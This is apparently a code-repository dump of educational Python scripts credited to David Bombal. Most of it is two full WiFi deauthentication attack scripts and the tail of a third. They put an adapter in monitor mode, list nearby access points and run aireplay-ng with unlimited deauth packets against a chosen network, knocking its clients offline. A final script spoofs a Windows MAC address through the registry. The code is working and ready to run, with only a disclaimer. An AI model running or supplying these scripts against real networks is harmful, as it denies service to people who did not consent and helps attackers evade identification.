94 | exit()
95 |
96 | # Menu to select WiFi interface from
97 | print("The following WiFi interfaces are available:")
98 | for index, item in enumerate(check_wifi_result):
99 | print(f"{index} - {item}")
100 |
101 | # Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from.
102 | while True:
103 | wifi_interface_choice = input("Please select the interface you want to use for the attack: ")
104 | try:
105 | if check_wifi_result[int(wifi_interface_choice)]:
106 | break
107 | except:
108 | print("Please enter a number that corresponds with the choices available.")
109 |
110 | # For easy reference we call the selected interface hacknic
111 | hacknic = check_wifi_result[int(wifi_interface_choice)]
112 |
113 | # Tell the user we're going to kill the conflicting processes.
114 | print("WiFi adapter connected!\nNow let's kill conflicting processes:")
115 |
116 | # subprocess.run()
117 | # The script is the parent process and creates a child process which runs the system command,
118 | # and will only continue once the child process has completed.
119 | # We run the iwconfig command to look for wireless interfaces.
120 | # Killing all conflicting processes using airmon-ng
121 | kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"])
122 |
123 | # Put wireless in Monitor mode
124 | print("Putting Wifi adapter into monitored mode:")
125 | put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic])
126 |
127 | # subprocess.Popen()
128 | # The Popen method opens a pipe from a command.
129 | # The output is an open file that can be accessed by other programs.
130 | # We run the iwconfig command to look for wireless interfaces.
131 | # Discover access points
132 | discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", check_wifi_result[0] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
133 |
134 | # Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c.
135 | try:
136 | while True:
137 | # We want to clear the screen before we print the network interfaces.
138 | subprocess.call("clear", shell=True)
139 | for file_name in os.listdir():
140 | # We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
141 | # The following list contains the field names for the csv entries.
142 | fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
143 | if ".csv" in file_name:
144 | with open(file_name) as csv_h:
145 | # This will run multiple times and we need to reset the cursor to the beginning of the file.
146 | csv_h.seek(0)
147 | # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
148 | # This creates a list of dictionaries with the keys as specified in the fieldnames.
149 | csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
150 | for row in csv_reader:
151 | # We want to exclude the row with BSSID.
152 | if row["BSSID"] == "BSSID":
153 | pass
154 | # We are not interested in the client data.
155 | elif row["BSSID"] == "Station MAC":
156 | break
157 | # Every field where an ESSID is specified will be added to the list.
158 | elif check_for_essid(row["ESSID"], active_wireless_networks):
159 | active_wireless_networks.append(row)
160 |
161 | print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
162 | print("No |\tBSSID |\tChannel|\tESSID |")
163 | print("___|\t___________________|\t_______|\t______________________________|")
164 | for index, item in enumerate(active_wireless_networks):
165 | # We're using the print statement with an f-string.
166 | # F-strings are a more intuitive way to include variables when printing strings,
167 | # rather than ugly concatenations.
168 | print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
169 | # We make the script sleep for 1 second before loading the updated list.
170 | time.sleep(1)
171 |
172 | except KeyboardInterrupt:
173 | print("\nReady to make choice.")
174 |
175 | # Ensure that the input choice is valid.
176 | while True:
177 | # If you don't make a choice from the options available in the list,
178 | # you will be asked to please try again.
179 | choice = input("Please select a choice from above: ")
180 | try:
181 | if active_wireless_networks[int(choice)]:
182 | break
183 | except:
184 | print("Please try again.")
185 |
186 | # To make it easier to work with and read the code, we assign the results to variables.
187 | hackbssid = active_wireless_networks[int(choice)]["BSSID"]
188 | hackchannel = active_wireless_networks[int(choice)]["channel"].strip()
189 |
190 | # Change to the channel we want to perform the DOS attack on.
191 | # Monitoring takes place on a different channel and we need to set it to that channel.
192 | subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel])
193 |
194 | # Deauthenticate clients using a subprocess.
195 | # The script is the parent process and creates a child process which runs the system command,
196 | # and will only continue once the child process has completed.
197 | subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"])
198 |
199 | # User will need to use control-c to break the script.
200 |
201 |
202 |
--------------------------------------------------------------------------------
/wifi_dos_type1.py:
--------------------------------------------------------------------------------
1 | # Disclaimer: This script is for educational purposes only. Do not use against any network that you don't own or have authorization to test.
2 |
3 | # We will be using the subprocess module to run commands on Kali Linux.
4 | import subprocess
5 | # We require regular expressions.
6 | import re
7 | # We want to open the CSV files generated by airmon-ng,
8 | # and we'll use the built-in csv module.
9 | import csv
10 | # We want to import os because we want to check for sudo
11 | import os
12 | # We want to use time.sleep()
13 | import time
14 | # We want to move .csv files in the folder if we found any.
15 | # We'll use shutil for that.
16 | import shutil
17 | # Create a timestamp for .csv filename
18 | from datetime import datetime
19 |
20 | # Create an empty list
21 | active_wireless_networks = []
22 |
23 | # We use this function to test if the ESSID is already in the list file.
24 | # If so we return False so we don't add it again.
25 | # If it is not in the lst we return True which will instruct the elif
26 | # statement to add it to the lst.
27 | def check_for_essid(essid, lst):
28 | check_status = True
29 |
30 | # If no ESSIDs in list add the row
31 | if len(lst) == 0:
32 | return check_status
33 |
34 | # This will only run if there are wireless access points in the list.
35 | for item in lst:
36 | # If True don't add to list. False will add it to list
37 | if essid in item["ESSID"]:
38 | check_status = False
39 |
40 | return check_status
41 |
42 | # Basic user interface header
43 | print(r"""______ _ _ ______ _ _
44 | | _ \ (_) | | | ___ \ | | | |
45 | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
46 | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
47 | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
48 | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
49 | print("\n****************************************************************")
50 | print("\n* Copyright of David Bombal, 2021 *")
51 | print("\n* https://www.davidbombal.com *")
52 | print("\n* https://www.youtube.com/davidbombal *")
53 | print("\n****************************************************************")
54 |
55 |
56 | # If the user doesn't run the program with super user privileges, don't allow them to continue.
57 | if not 'SUDO_UID' in os.environ.keys():
58 | print("Try running this program with sudo.")
59 | exit()
60 |
61 | # Remove .csv files before running the script.
62 | for file_name in os.listdir():
63 | # We should only have one csv file as we delete them from the folder
64 | # every time we run the program.
65 | if ".csv" in file_name:
66 | print("There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.")
67 | # We get the current working directory.
68 | directory = os.getcwd()
69 | try:
70 | # We make a new directory called /backup
71 | os.mkdir(directory + "/backup/")
72 | except:
73 | print("Backup folder exists.")
74 | # Create a timestamp
75 | timestamp = datetime.now()
76 | # We move any .csv files in the folder to the backup folder.
77 | shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
78 |
79 | # Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher.
80 | wlan_pattern = re.compile("^wlan[0-9]+")
81 |
82 | # Python allows is to run system commands by using a function provided by the subprocess module.
83 | # subprocess.run()
84 | # The script is the parent process and creates a child process which runs the system command,
85 | # and will only continue once the child process has completed.
86 | # We run the iwconfig command to look for wireless interfaces.
87 | check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode())
88 |
89 | # No WiFi Adapter connected.
90 | if len(check_wifi_result) == 0:
91 | print("Please connect a WiFi adapter and try again.")
92 | exit()
93 |
94 | # Menu to select WiFi interface from
95 | print("The following WiFi interfaces are available:")
96 | for index, item in enumerate(check_wifi_result):
97 | print(f"{index} - {item}")
98 |
99 | # Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from.
100 | while True:
101 | wifi_interface_choice = input("Please select the interface you want to use for the attack: ")
102 | try:
103 | if check_wifi_result[int(wifi_interface_choice)]:
104 | break
105 | except:
106 | print("Please enter a number that corresponds with the choices available.")
107 |
108 | # For easy reference we call the selected interface hacknic
109 | hacknic = check_wifi_result[int(wifi_interface_choice)]
110 |
111 | # Tell the user we're going to kill the conflicting processes.
112 | print("WiFi adapter connected!\nNow let's kill conflicting processes:")
113 |
114 | # subprocess.run()
115 | # The script is the parent process and creates a child process which runs the system command,
116 | # and will only continue once the child process has completed.
117 | # We run the iwconfig command to look for wireless interfaces.
118 | # Killing all conflicting processes using airmon-ng
119 | kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"])
120 |
121 | # Put wireless in Monitor mode
122 | print("Putting Wifi adapter into monitored mode:")
123 | put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic])
124 |
125 | # subprocess.Popen()
126 | # The Popen method opens a pipe from a command.
127 | # The output is an open file that can be accessed by other programs.
128 | # We run the iwconfig command to look for wireless interfaces.
129 | # Discover access points
130 | discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", check_wifi_result[0] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
131 |
132 | # Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c.
133 | try:
134 | while True:
135 | # We want to clear the screen before we print the network interfaces.
136 | subprocess.call("clear", shell=True)
137 | for file_name in os.listdir():
138 | # We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
139 | # The following list contains the field names for the csv entries.
140 | fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
141 | if ".csv" in file_name:
142 | with open(file_name) as csv_h:
143 | # This will run multiple times and we need to reset the cursor to the beginning of the file.
144 | csv_h.seek(0)
145 | # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
146 | # This creates a list of dictionaries with the keys as specified in the fieldnames.
147 | csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
148 | for row in csv_reader:
149 | # We want to exclude the row with BSSID.
150 | if row["BSSID"] == "BSSID":
151 | pass
152 | # We are not interested in the client data.
153 | elif row["BSSID"] == "Station MAC":
154 | break
155 | # Every field where an ESSID is specified will be added to the list.
156 | elif check_for_essid(row["ESSID"], active_wireless_networks):
157 | active_wireless_networks.append(row)
158 |
159 | print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
160 | print("No |\tBSSID |\tChannel|\tESSID |")
161 | print("___|\t___________________|\t_______|\t______________________________|")
162 | for index, item in enumerate(active_wireless_networks):
163 | # We're using the print statement with an f-string.
164 | # F-strings are a more intuitive way to include variables when printing strings,
165 | # rather than ugly concatenations.
166 | print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
167 | # We make the script sleep for 1 second before loading the updated list.
168 | time.sleep(1)
169 |
170 | except KeyboardInterrupt:
171 | print("\nReady to make choice.")
172 |
173 | # Ensure that the input choice is valid.
174 | while True:
175 | # If you don't make a choice from the options available in the list,
176 | # you will be asked to please try again.
177 | choice = input("Please select a choice from above: ")
178 | try:
179 | if active_wireless_networks[int(choice)]:
180 | break
181 | except:
182 | print("Please try again.")
183 |
184 | # To make it easier to work with and read the code, we assign the results to variables.
185 | hackbssid = active_wireless_networks[int(choice)]["BSSID"]
186 | hackchannel = active_wireless_networks[int(choice)]["channel"].strip()
187 |
188 | # Change to the channel we want to perform the DOS attack on.
189 | # Monitoring takes place on a different channel and we need to set it to that channel.
190 | subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel])
191 |
192 | # Deauthenticate clients using a subprocess.
193 | # The script is the parent process and creates a child process which runs the system command,
194 | # and will only continue once the child process has completed.
195 | subprocess.run(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"])
196 |
197 | # User will need to use control-c to break the script.
198 |
199 |
200 |
--------------------------------------------------------------------------------
/wifi_dos_type2.py:
--------------------------------------------------------------------------------
1 | # Disclaimer: This script is for educational purposes only. Do not use against any network that you don't own or have authorization to test.
2 |
3 | # We will be using the subprocess module to run commands on Kali Linux.
4 | import subprocess
5 | # We will require regular expressions.
6 | import re
7 | # We want to open the CSV files generated by airmon-ng, and we'll use the built-in csv module.
8 | import csv
9 | # We want to import os because we want to check for sudo
10 | import os
11 | # We want to use time.sleep()
12 | import time
13 | # We want to move .csv files in the folder if we found any. We'll use shutil for that.
14 | import shutil
15 | # Create a timestamp for .csv filename
16 | from datetime import datetime
17 |
18 | # We declare an empty list where all active wireless networks will be saved to.
19 | active_wireless_networks = []
20 |
21 | # We use this function to test if the ESSID is already in the list file.
22 | # If so we return False so we don't add it again.
23 | # If it is not in the lst we return True which will instruct the elif
24 | # statement to add it to the lst.
25 | def check_for_essid(essid, lst):
26 | check_status = True
27 |
28 | # If no ESSIDs in list add the row
29 | if len(lst) == 0:
30 | return check_status
31 |
32 | # This will only run if there are wireless access points in the list.
33 | for item in lst:
34 | # If True don't add to list. False will add it to list
35 | if essid in item["ESSID"]:
36 | check_status = False
37 |
38 | return check_status
39 |
40 | # Basic user interface header
41 | print(r"""______ _ _ ______ _ _
42 | | _ \ (_) | | | ___ \ | | | |
43 | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| |
44 | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | |
45 | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | |
46 | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""")
47 | print("\n****************************************************************")
48 | print("\n* Copyright of David Bombal, 2021 *")
49 | print("\n* https://www.davidbombal.com *")
50 | print("\n* https://www.youtube.com/davidbombal *")
51 | print("\n****************************************************************")
52 |
53 |
54 | # If the user doesn't run the program with super user privileges, don't allow them to continue.
55 | if not 'SUDO_UID' in os.environ.keys():
56 | print("Try running this program with sudo.")
57 | exit()
58 |
59 | # Move all .csv files in the directory to a backup folder.
60 | for file_name in os.listdir():
61 | # We should only have one csv file as we delete them from the folder every time we run the program.
62 | if ".csv" in file_name:
63 | print("There shouldn't be any .csv files in your directory. We found .csv files in your directory.")
64 | # We get the current working directory.
65 | directory = os.getcwd()
66 | try:
67 | # We make a new directory called /backup
68 | os.mkdir(directory + "/backup/")
69 | except:
70 | print("Backup folder exists.")
71 | # Create a timestamp
72 | timestamp = datetime.now()
73 | # We copy any .csv files in the folder to the backup folder.
74 | shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name)
75 |
76 | # Regex to find wireless interfaces, we're making the assumption they will all be wlan0 or higher.
77 | wlan_pattern = re.compile("^wlan[0-9]+")
78 |
79 | # Python allows is to run system commands by using a function provided by the subprocess module.
80 | # subprocess.run(, )
81 | # We want to capture the output. The output will be in standard UTF-8 and will decode it.
82 | # The script is the parent process and creates a child process which runs the system command, and will only continue once the child process has completed.
83 | # We run the iwconfig command to look for wireless interfaces.
84 | check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode())
85 |
86 | # No WiFi Adapter connected.
87 | if len(check_wifi_result) == 0:
88 | print("Please connect a WiFi controller and try again.")
89 | exit()
90 |
91 | # Menu to select WiFi interface from
92 | print("The following WiFi interfaces are available:")
93 | for index, item in enumerate(check_wifi_result):
94 | print(f"{index} - {item}")
95 |
96 | # Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from.
97 | while True:
98 | wifi_interface_choice = input("Please select the interface you want to use for the attack: ")
99 | try:
100 | if check_wifi_result[int(wifi_interface_choice)]:
101 | break
102 | except:
103 | print("Please enter a number that corresponds with the choices.")
104 |
105 | # For easy reference we call the picked interface hacknic
106 | hacknic = check_wifi_result[int(wifi_interface_choice)]
107 |
108 | # Kill conflicting WiFi processses
109 | print("WiFi adapter connected!\nNow let's kill conflicting processes:")
110 |
111 | # subprocess.run()
112 | # The script is the parent process and creates a child process which runs the system command, and will only continue once the child process has completed.
113 | # We run the iwconfig command to look for wireless interfaces.
114 | # Killing all conflicting processes using airmon-ng
115 | kill_confilict_processes = subprocess.run(["sudo", "airmon-ng", "check", "kill"])
116 |
117 | # Put wireless in Monitored mode
118 | print("Putting Wifi adapter into monitored mode:")
119 | put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic])
120 |
121 | # subprocess.Popen()
122 | # The Popen method opens a pipe from a command. The output is an open file that can be accessed by other programs.
123 | # We run the iwconfig command to look for wireless interfaces.
124 | # Discover access points
125 | discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", check_wifi_result[0] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
126 |
127 | # Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c.
128 | try:
129 | while True:
130 | # We want to clear the screen before we print the network interfaces.
131 | subprocess.call("clear", shell=True)
132 | for file_name in os.listdir():
133 | # We should only have one csv file as we backup all previous csv files from the folder every time we run the program.
134 | # The following list contains the field names for the csv entries.
135 | fieldnames = ['BSSID', 'First_time_seen', 'Last_time_seen', 'channel', 'Speed', 'Privacy', 'Cipher', 'Authentication', 'Power', 'beacons', 'IV', 'LAN_IP', 'ID_length', 'ESSID', 'Key']
136 | if ".csv" in file_name:
137 | with open(file_name) as csv_h:
138 | # We use the DictReader method and tell it to take the csv_h contents and then apply the dictionary with the fieldnames we specified above.
139 | # This creates a list of dictionaries with the keys as specified in the fieldnames.
140 | csv_h.seek(0)
141 | csv_reader = csv.DictReader(csv_h, fieldnames=fieldnames)
142 | for row in csv_reader:
143 | if row["BSSID"] == "BSSID":
144 | pass
145 | elif row["BSSID"] == "Station MAC":
146 | break
147 | elif check_for_essid(row["ESSID"], active_wireless_networks):
148 | active_wireless_networks.append(row)
149 |
150 | print("Scanning. Press Ctrl+C when you want to select which wireless network you want to attack.\n")
151 | print("No |\tBSSID |\tChannel|\tESSID |")
152 | print("___|\t___________________|\t_______|\t______________________________|")
153 | for index, item in enumerate(active_wireless_networks):
154 | # We're using the print statement with an f-string.
155 | # F-strings are a more intuitive way to include variables when printing strings,
156 | # rather than ugly concatenations.
157 | print(f"{index}\t{item['BSSID']}\t{item['channel'].strip()}\t\t{item['ESSID']}")
158 | # We make the script sleep for 1 second before loading the updated list.
159 | time.sleep(1)
160 |
161 | except KeyboardInterrupt:
162 | print("\nReady to make choice.")
163 |
164 | # Ensure that the input choice is valid.
165 | while True:
166 | choice = input("Please select a choice from above: ")
167 | try:
168 | if active_wireless_networks[int(choice)]:
169 | break
170 | except:
171 | print("Please try again.")
172 |
173 | # To make it easier to work with we assign the results to variables.
174 | hackbssid = active_wireless_networks[int(choice)]["BSSID"]
175 | hackchannel = active_wireless_networks[int(choice)]["channel"].strip()
176 |
177 | # Change to the channel we want to perform the DOS attack on.
178 | # Monitoring takes place on a different channel and we need to set it to that channel.
179 | subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel])
180 |
181 | # Deauthenticate clients. We run it with Popen and we send the output to subprocess.DEVNULL and the errors to subprocess.DEVNULL. We will thus run deauthenticate in the background.
182 | subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
183 |
184 | # We run an infinite loop which you can quit by presses ctrl-c. The deauthentication will stop when we stop the script.
185 | try:
186 | while True:
187 | print("Deauthenticating clients, press ctrl-c to stop")
188 | except KeyboardInterrupt:
189 | print("Stop monitoring mode")
190 | # We run a subprocess.run command where we stop monitoring mode on the network adapter.
191 | subprocess.run(["airmon-ng", "stop", hacknic + "mon"])
192 | print("Thank you! Exiting now")
193 |
194 |
195 |
196 |
--------------------------------------------------------------------------------
/change-windows10-mac-address.py:
--------------------------------------------------------------------------------
1 | ##################################################################################################
2 | #Copyright of David Bombal, 2021 #
3 | #https://www.davidbombal.com #
4 | #https://www.youtube.com/davidbombal #
5 | # #
6 | # Please note that this code can be improved by using functions. It is not programmed to cater #
7 | # for all situations, but to be used as a learning tool. #
8 | # #
9 | # This code is provided for educational purposes only. Do good. Be Ethical. #
10 | # #
11 | ##################################################################################################
12 |
13 | import subprocess
14 | import winreg
15 | import re
16 | import codecs
17 |
18 | print("##############################################################")
19 | print("1) Make sure you run this script with administrator privileges")
20 | print("2) Make sure that the WiFi adapter is connected to a network")
21 | print("##############################################################\n")
22 |
23 | # MAC Addresses to attempt using. You will select one when the script is used.
24 | # You can change the names in this list or add names to this list.
25 | # Make sure you use 12 valid hexadecimal values.
26 | # If the MAC address change fails try setting the second character to 2 or 6 or A or E,
27 | # for example: 0A1122334455 or 0A5544332211
28 | # If unsure, leave the MAC addresses listed here as is.
29 | mac_to_change_to = ["0A1122334455", "0E1122334455", "021122334455", "061122334455"]
30 |
31 | # We create an empty list where we'll store all the MAC addresses.
32 | mac_addresses = list()
33 |
34 | # We start off by creating a regular expression (regex) for MAC addresses.
35 | macAddRegex = re.compile(r"([A-Za-z0-9]{2}[:-]){5}([A-Za-z0-9]{2})")
36 |
37 | # We create a regex for the transport names. It will work in this case.
38 | # But when you use the .+ or .*, you should consider making it not as greedy.
39 | transportName = re.compile("({.+})")
40 |
41 | # We create regex to pick out the adapter index
42 | adapterIndex = re.compile("([0-9]+)")
43 |
44 | # Python allows us to run system commands by using a function provided by the subprocess module:
45 | # (subprocess.run(,
46 | # ))
47 | # The script is a parent process and creates a child process which runs the system command,
48 | # and will only continue once the child process has completed.
49 | # To save the content that gets sent to the standard output stream (the terminal),
50 | # we have to specify that we want to capture the output, so we specify the second
51 | # argument as capture_output = True. This information gets stored in the stdout attribute.
52 | # The information is stored in bytes and we need to decode it to Unicode before we use it
53 | # as a String in Python.
54 | # We use Python to run the getmac command, and then capture the output.
55 | # We split the output at the newline so that we can work with the individual lines
56 | # (which will contain the Mac and transport name).
57 | getmac_output = subprocess.run("getmac", capture_output=True).stdout.decode().split('\n')
58 |
59 | # We loop through the output
60 | for macAdd in getmac_output:
61 | # We use the regex to find the Mac Addresses.
62 | macFind = macAddRegex.search(macAdd)
63 | # We use the regex to find the transport name.
64 | transportFind = transportName.search(macAdd)
65 | # If you don't find a Mac Address or Transport name the option won't be listed.
66 | if macFind == None or transportFind == None:
67 | continue
68 | # We append a tuple with the Mac Address and the Transport name to a list.
69 | mac_addresses.append((macFind.group(0),transportFind.group(0)))
70 |
71 | # Create a simple menu to select which Mac Address the user want to update.
72 | print("Which MAC Address do you want to update?")
73 | for index, item in enumerate(mac_addresses):
74 | print(f"{index} - Mac Address: {item[0]} - Transport Name: {item[1]}")
75 |
76 | # Prompt the user to select Mac Address they want to update.
77 | option = input("Select the menu item number corresponding to the MAC that you want to change:")
78 |
79 | # Create a simple menu so the user can pick a MAC address to use
80 | while True:
81 | print("Which MAC address do you want to use? This will change the Network Card's MAC address.")
82 | for index, item in enumerate(mac_to_change_to):
83 | print(f"{index} - Mac Address: {item}")
84 |
85 | # Prompt the user to select the MAC address they want to change to.
86 | update_option = input("Select the menu item number corresponding to the new MAC address that you want to use:")
87 | # Check to see if the option the user picked is a valid option.
88 | if int(update_option) >= 0 and int(update_option) < len(mac_to_change_to):
89 | print(f"Your Mac Address will be changed to: {mac_to_change_to[int(update_option)]}")
90 | break
91 | else:
92 | print("You didn't select a valid option. Please try again!")
93 |
94 | # We know the first part of the key, we'll append the folders where we'll search the values
95 | controller_key_part = r"SYSTEM\ControlSet001\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}"
96 |
97 | # We connect to the HKEY_LOCAL_MACHINE registry. If we specify None,
98 | # it means we connect to local machine's registry.
99 | with winreg.ConnectRegistry(None, winreg.HKEY_LOCAL_MACHINE) as hkey:
100 | # Create a list for the 21 folders. I used a list comprehension. The expression part of the list comprehension
101 | # makes use of a ternary operator. The transport value for you Mac Address should fall within this range.
102 | # You could write multiple lines.
103 | controller_key_folders = [("\\000" + str(item) if item < 10 else "\\00" + str(item)) for item in range(0, 21)]
104 | # We now iterate through the list of folders we created.
105 | for key_folder in controller_key_folders:
106 | # We try to open the key. If we can't we just except and pass. But it shouldn't be a problem.
107 | try:
108 | # We have to specify the registry we connected to, the controller key
109 | # (This is made up of the controller_key_part we know and the folder(key) name we created
110 | # with the list comprehension).
111 | with winreg.OpenKey(hkey, controller_key_part + key_folder, 0, winreg.KEY_ALL_ACCESS) as regkey:
112 | # We will now look at the Values under each key and see if we can find the "NetCfgInstanceId"
113 | # with the same Transport Id as the one we selected.
114 | try:
115 | # Values start at 0 in the registry and we have to count through them.
116 | # This will continue until we get a WindowsError (Where we will then just pass)
117 | # then we'll start with the next folder until we find the correct key which contains
118 | # the value we're looking for.
119 | count = 0
120 | while True:
121 | # We unpack each individual winreg value into name, value and type.
122 | name, value, type = winreg.EnumValue(regkey, count)
123 | # To go to the next value if we didn't find what we're looking for we increment count.
124 | count = count + 1
125 | # We check to see if our "NetCfgInstanceId" is equal to our Transport number for our
126 | # selected Mac Address.
127 | if name == "NetCfgInstanceId" and value == mac_addresses[int(option)][1]:
128 | new_mac_address = mac_to_change_to[int(update_option)]
129 | winreg.SetValueEx(regkey, "NetworkAddress", 0, winreg.REG_SZ, new_mac_address)
130 | print("Successly matched Transport Number")
131 | # get list of adapters and find index of adapter you want to disable.
132 | break
133 | except WindowsError:
134 | pass
135 | except:
136 | pass
137 |
138 |
139 | # Code to disable and enable Wireless devicess
140 | run_disable_enable = input("Do you want to disable and reenable your wireless device(s). Press Y or y to continue:")
141 | # Changes the input to lowercase and compares to y. If not y the while function which contains the last part will never run.
142 | if run_disable_enable.lower() == 'y':
143 | run_last_part = True
144 | else:
145 | run_last_part = False
146 |
147 | # run_last_part will be set to True or False based on above code.
148 | while run_last_part:
149 |
150 | # Code to disable and enable the network adapters
151 | # We get a list of all network adapters. You have to ignore errors, as it doesn't like the format the command returns the data in.
152 | network_adapters = subprocess.run(["wmic", "nic", "get", "name,index"], capture_output=True).stdout.decode('utf-8', errors="ignore").split('\r\r\n')
153 | for adapter in network_adapters:
154 | # We get the index for each adapter
155 | adapter_index_find = adapterIndex.search(adapter.lstrip())
156 | # If there is an index and the adapter has wireless in description we are going to disable and enable the adapter
157 | if adapter_index_find and "Wireless" in adapter:
158 | disable = subprocess.run(["wmic", "path", "win32_networkadapter", "where", f"index={adapter_index_find.group(0)}", "call", "disable"],capture_output=True)
159 | # If the return code is 0, it means that we successfully disabled the adapter
160 | if(disable.returncode == 0):
161 | print(f"Disabled {adapter.lstrip()}")
162 | # We now enable the network adapter again.
163 | enable = subprocess.run(["wmic", "path", f"win32_networkadapter", "where", f"index={adapter_index_find.group(0)}", "call", "enable"],capture_output=True)
164 | # If the return code is 0, it means that we successfully enabled the adapter
165 | if (enable.returncode == 0):
166 | print(f"Enabled {adapter.lstrip()}")
167 |
168 | # We run the getmac command again
169 | getmac_output = subprocess.run("getmac", capture_output=True).stdout.decode()
170 | # We recreate the Mac Address as ot shows up in getmac XX-XX-XX-XX-XX-XX format from the 12 character string we have. We split the string into strings of length 2 using list comprehensions and then. We use "-".join(list) to recreate the address
171 | mac_add = "-".join([(mac_to_change_to[int(update_option)][i:i+2]) for i in range(0, len(mac_to_change_to[int(update_option)]), 2)])
172 | # We want to check if Mac Address we changed to is in getmac output, if so we have been successful.
173 | if mac_add in getmac_output:
174 | print("Mac Address Success")
175 | # Break out of the While loop. Could also change run_last_part to False.
176 | break
177 |
--------------------------------------------------------------------------------